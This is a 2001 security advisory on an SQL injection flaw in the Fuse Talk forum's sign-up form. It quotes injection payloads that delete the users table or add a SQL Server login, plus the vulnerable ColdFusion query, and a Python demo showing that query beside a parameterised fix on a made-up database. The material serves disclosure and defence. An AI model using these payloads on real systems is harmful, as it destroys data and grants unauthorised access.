[NT] Fuse Talk SQL Insertion Vulnerability

From: support@securiteam.com
Date: 11/04/01

To: list@securiteam.com
Message-Id: <20011104071738.9AC8A138BF@mail.der-keiler.de>
Date: Sun,  4 Nov 2001 08:17:38 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Fuse Talk SQL Insertion Vulnerability
------------------------------------------------------------------------

SUMMARY

E-Zonemedia's Fuse Talk is vulnerable to malicious SQL injection. Improper
form sanitization makes it possible for any user to manipulate data as
they see fit. The vulnerability is present in the sign-up form (join.cfm):
a well-crafted form variable will execute malicious SQL. It is caused by
the form not filtering out the semicolon (;), so the value is passed into
the query text unchanged.

DETAILS

Example:
Examine the following code:

1;delete from users

or

1;exec sp_addlogin "whatever"

If either of these is passed as the time zone parameter, the following SQL
will be executed:

select chdifference from timezones where itimezoneid = 1;exec sp_addlogin "whatever"

This has the effect of adding a new login to the SQL server's user database,
allowing that user to log on without requiring a password.

Vulnerable code:
<cfquery name="qgetdiff" datasource="#ds#">
  select chdifference from timezones where itimezoneid = #timezone#
</cfquery>
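The root cause is the bare #timezone# above: an unvalidated form value is
interpolated into the statement text, so anything after a semicolon becomes
a second statement. The fix is to validate the value as an integer and bind
it as a typed parameter; in ColdFusion that means replacing #timezone# with
<cfqueryparam value="#timezone#" cfsqltype="cf_sql_integer">. The script
below is an added example written for this page, not code from the advisory
or from Fuse Talk. It reproduces the string-built query next to the hardened,
parameterised lookup against a constructed in-memory SQLite database whose
timezones and users tables and rows are made up. sqlite3's executescript()
stands in for a driver that runs stacked statements, as SQL Server's batch
execution does; the function names are this example's own.

```python
import re
import sqlite3

# Constructed stand-in for the advisory's "timezones" and "users" tables.
# The rows are made up for this example; nothing here comes from Fuse Talk.
SCHEMA = """
create table timezones (itimezoneid integer primary key, chdifference text);
create table users (id integer primary key, name text);
insert into timezones values (1, '+0'), (2, '-5');
insert into users values (1, 'alice'), (2, 'bob');
"""


def make_db():
    """Fresh in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def user_count(conn):
    """Row count of the users table, used to observe what a query did."""
    return conn.execute("select count(*) from users").fetchone()[0]


def build_vulnerable_sql(timezone):
    """The advisory's cfquery, line for line: the form value is pasted into
    the statement text, so a value such as '1;delete from users' becomes a
    second statement instead of an integer id."""
    return f"select chdifference from timezones where itimezoneid = {timezone}"


def vulnerable_lookup(conn, timezone):
    """Runs the string-built query. executescript() is used on purpose: like
    SQL Server's batch execution it runs every ';'-separated statement, which
    sqlite3's execute() would refuse and which the bug depends on.
    Returns the SQL that was actually sent, so the injected tail is visible."""
    sql = build_vulnerable_sql(timezone)
    conn.executescript(sql)
    return sql


def safe_lookup(conn, timezone):
    """Hardened form: accept only an integer id and bind it as a parameter.
    This is the same idea as ColdFusion's
    <cfqueryparam value="#timezone#" cfsqltype="cf_sql_integer">:
    the value can never change the shape of the statement."""
    if not isinstance(timezone, str) or not re.fullmatch(r"[0-9]+", timezone.strip()):
        raise ValueError(f"timezone must be an integer id, got {timezone!r}")
    row = conn.execute(
        "select chdifference from timezones where itimezoneid = ?",
        (int(timezone),),
    ).fetchone()
    return row[0] if row else None


def is_rejected(conn, timezone):
    """True when the hardened lookup refuses the value before any SQL runs."""
    try:
        safe_lookup(conn, timezone)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "1;delete from users"  # the advisory's first example value

    conn = make_db()
    print("hardened lookup of '1':", safe_lookup(conn, "1"))
    print("hardened lookup rejects payload:", is_rejected(conn, payload))
    print("users after hardened lookup:", user_count(conn))

    conn = make_db()
    print("vulnerable query sent:", vulnerable_lookup(conn, payload))
    print("users after vulnerable lookup:", user_count(conn))
```

Run stand-alone, the script shows the hardened lookup returning the time zone
row for "1", refusing the advisory's payload outright, and leaving the users
table intact, while the string-built query sends the payload through verbatim
and empties the table. The integer check is deliberately strict (ASCII digits
only) because the column is an integer key; anything else has no legitimate
reason to reach the database.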

ADDITIONAL INFORMATION

The information has been provided by Anthony Cole <acole76@bellsouth.net>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.